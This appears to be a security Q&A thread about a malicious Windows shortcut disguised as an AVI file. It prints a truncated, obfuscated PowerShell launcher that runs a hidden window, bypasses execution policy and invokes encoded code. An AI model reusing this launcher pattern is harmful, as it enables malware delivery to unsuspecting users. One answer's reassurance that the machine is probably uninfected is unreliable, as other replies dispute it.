4

I just ran an AVI file that was sent to me, thinking AVIs were safe. Turns out it was a windows shortcut with this in the path:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoPr -WINd
1 -eXEc ByP  . ( $shelliD[1]+$SHeLlID[13]+'x') ([StrIng]::jOin( '',
[CHar[]](36 ,97,115, 112 , 120,32 ,61,32 ,40 ,40, 78, 101 , 119, 45,
79 , 98, 106,101,99, 116 , 32 ,83, 121 , 115,116, 101

I'm hoping the lack of closing parens means this was inoccuous. Have I screwed myself?

Anders
  • 64,406
  • 24
  • 178
  • 215
Brad Irby
  • 141
  • 1
  • 1
    "$ ,a,s, p , x, ,=, ,( ,(, N, e , w, -,O , b, j,e,c, t , ,S, y , s,t, e" is the ascii translation of the decimals...looks like there is more to this message. – DarkMatter Dec 05 '18 at 20:35
  • 1
    that's all that was in the "Target" textbox of the shortcut - at least from what I can see in Properties for the file. i assume i got lucky and the full string was cut off? or can the ":Target" text be longer than what is shown in the Properties window? – Brad Irby Dec 05 '18 at 20:45
  • I don't know the answer to that but I would strongly assume the latter – DarkMatter Dec 05 '18 at 20:46
  • I looked it up 260 character max path...you are at ~260 in that path. – DarkMatter Dec 05 '18 at 20:48
  • Do you have powershell logging turned on? – DarkMatter Dec 05 '18 at 20:52
  • I've not done it, so unless it's on by default, no. I used this https://blez.wordpress.com/2013/02/18/get-file-shortcuts-target-with-c/ to pull 10K chars out of the file starting at the first char of the Target. I can't tell if there's anything significant in there - it's just a bunch lf "\0 \01\01\06\0" etc for 10K chars. I do see something about Imageres.dll. what is that? – Brad Irby Dec 05 '18 at 21:10
  • Post some of the "chars" I'll take a look. – DarkMatter Dec 05 '18 at 21:11
  • I couldn't post it here - too big. I shared the txt file here: https://1drv.ms/t/s!ApzPbwb_9H4Gg71GUZyEQlR_y0pczg – Brad Irby Dec 05 '18 at 21:21
  • Googling your string brings up some stuff, like this: https://forums.malwarebytes.com/topic/238650-powershell-virus/ Looks like it could be a huge file (700 MB?) with a lot of useless padding. Then it probably downloads malware from a website, which in turn is obfuscated. So yeah, totally malicious, but maybe difficult to know what it does exactly. – reed Dec 05 '18 at 21:22
  • `imageres.dll` is an icon repository. It probably is referenced to give the link an AVI icon. And I think your machine is infected. – ThoriumBR Dec 05 '18 at 21:23
  • ARGH! yeah, it was a big file. I guess it's time for a rebuild anyway. – Brad Irby Dec 05 '18 at 21:26
  • a follow up question. i'm looking at the Win 10 Reset function here: https://answers.microsoft.com/en-us/windows/forum/windows_10/how-to-perform-a-clean-install-using-reset-this-pc/6f6335fc-8d15-4598-af16-033d1d8c16bf. That should get rid of anything that was installed, right? – Brad Irby Dec 06 '18 at 11:51

2 Answers2

3

Shortcut files (technically .lnk files) are mostly text and can be read using any program that tries to open the file rather than invoke ShellExecute on it. The text will contain the embedded command. The lack of closing parens, the incompleteness of the New-Object cmdlet, and so on probably mean you're fine so long as the shortcut is in fact truncated; if it isn't, you should probably assume the machine is compromised.

Out of curiosity, what shitty program transferred a .LNK file to you while hiding the extension? Very nearly all programs that hide the .LNK are aware that shortcuts can be malicious and will warn you, rename them, or outright block them. Did it suddenly get really twentieth-century in here? Anyhow, you should definitely report that as a security bug in the program (assuming, of course, it both did hide the .LNK and did not warn you).

CBHacking
  • 40,303
  • 3
  • 74
  • 98
  • I think OP received a `.lnk` file with the `avi` icon and double extension, and hit *Open* instead of *Save*... – ThoriumBR Dec 05 '18 at 21:20
  • yes, that's exactly what happened. even with extensions displayed in file explorer, the .lnk doesn't show so if you name something MyFile.avi.lnk it shows up like MyFile.avi in file explorer. – Brad Irby Dec 05 '18 at 21:24
  • 1
    Please somebody tell me how it is possible, in 2018, that the most common OS on this planet, developed by one of the richest companies ever, can still allow something so blatantly stupid as not displaying dangerous file extensions or even allowing them to execute right away when you click it. I seriously cannot understand it. – reed Dec 05 '18 at 21:34
  • @ThoriumBR: The question was in what way it was received. If it was a flashdrive, well, don't open files from sketchy flashdrives. If it was some software (file sharing program, file transfer program, web browser, email client, chat client, etc.) then which one, because it really should have displayed a warning or at least displayed the true extension. With that said, I agree that the handling of shortcuts in Windows is terrible, although the little arrow icon is *reasonably* obvious to me. – CBHacking Dec 06 '18 at 07:31
  • @reed if all updates and security policies are configured correctly, there's no such thing as blindly (read: without warning) running shellexecute on files in e.g. the Downloads folder or Network drives. The extension being hidden sounds like an odd countermeasure. While it would help a tech-savvy person, the average secretary will gladly open your .sfx or .exe attachments (if they were possible). – Nomad Feb 04 '19 at 14:34
  • @BradIrby although not showing the .lnk extension, it should have showed the shortcut overlay, though. – Ángel Nov 01 '19 at 14:49
0

That fragment fwiw converts to

$aspx = ((New-Object Syste

... in which case it would seem unsuccessful if that really is the end of it.

your question was 'did I infect my machine'?

I'm going with 'no' since it seems unlikely to have been successful for the circumstances provided (which is pretty common, a lot of exploits are broken / don't work for particular circumstances).

pacifist
  • 794
  • 3
  • 8